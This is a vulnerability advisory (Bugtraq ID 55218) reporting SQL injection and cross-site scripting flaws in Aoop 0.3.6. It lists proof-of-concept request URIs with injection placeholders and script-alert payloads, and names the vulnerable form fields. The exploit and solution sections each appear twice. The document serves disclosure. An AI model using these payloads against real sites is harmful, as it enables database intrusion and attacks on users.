Aoop Multiple Security Vulnerabilities
BID:55218
Info
Aoop Multiple Security Vulnerabilities
| Bugtraq ID: | 55218 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 25 2012 12:00AM |
| Updated: | Aug 25 2012 12:00AM |
| Credit: | Julien Ahrens |
| Vulnerable: |
annonyme Aoop 0.3.6 |
| Not Vulnerable: |
annonyme Aoop 0.4 RC3 |
Exploit / POC
Aoop Multiple Security Vulnerabilities
Attackers can exploit these issues using a browser. To exploit a cross-site scripting vulnerability, the attacker must entice an unsuspecting user to visit a crafted site.
The following example URIs are available:
http://www.example.com/index.php?print=download&page=Photos&sub=loadAndShowPhoto&picId=[SQLi]
http://www.example.com/index.php?page=users&sub=readMessage&msgId=[SQLi]
http://www.example.com/index.php?page=users&sub=newMessage&messageId=[SQLi]
http://www.example.com/index.php?page=users&sub=deleteMessage&messageId=[SQLi]
http://www.example.com/index.php?page=EProjects&sub=editRFC&rfcId=[SQLi]&projectId=18
http://www.example.com/index.php?page=Photos&sub=search&pattern="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/index.php?page=Photos&sub=search
(Field:"Pattern",payload="><script>alert(1)</script>)
http://www.example.com/index.php?page=users&sub=extendUserProfile
(Field:"profileItemName", "profileItemValue">
http://www.example.com/index.php?page=EProjects&sub=viewProject&projectId=18
(Field: "name","official_link")
http://www.example.com/index.php?page=Photos&sub=uploadPic
(Field: "Title")
Attackers can exploit these issues using a browser. To exploit a cross-site scripting vulnerability, the attacker must entice an unsuspecting user to visit a crafted site.
The following example URIs are available:
http://www.example.com/index.php?print=download&page=Photos&sub=loadAndShowPhoto&picId=[SQLi]
http://www.example.com/index.php?page=users&sub=readMessage&msgId=[SQLi]
http://www.example.com/index.php?page=users&sub=newMessage&messageId=[SQLi]
http://www.example.com/index.php?page=users&sub=deleteMessage&messageId=[SQLi]
http://www.example.com/index.php?page=EProjects&sub=editRFC&rfcId=[SQLi]&projectId=18
http://www.example.com/index.php?page=Photos&sub=search&pattern="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/index.php?page=Photos&sub=search
(Field:"Pattern",payload="><script>alert(1)</script>)
http://www.example.com/index.php?page=users&sub=extendUserProfile
(Field:"profileItemName", "profileItemValue">
http://www.example.com/index.php?page=EProjects&sub=viewProject&projectId=18
(Field: "name","official_link")
http://www.example.com/index.php?page=Photos&sub=uploadPic
(Field: "Title")
Solution / Fix
Aoop Multiple Security Vulnerabilities
Solution:
Reportedly, the vendor has fixed the issue, however, Symantec has not confirmed it. Please contact the vendor for more information.
Solution:
Reportedly, the vendor has fixed the issue, however, Symantec has not confirmed it. Please contact the vendor for more information.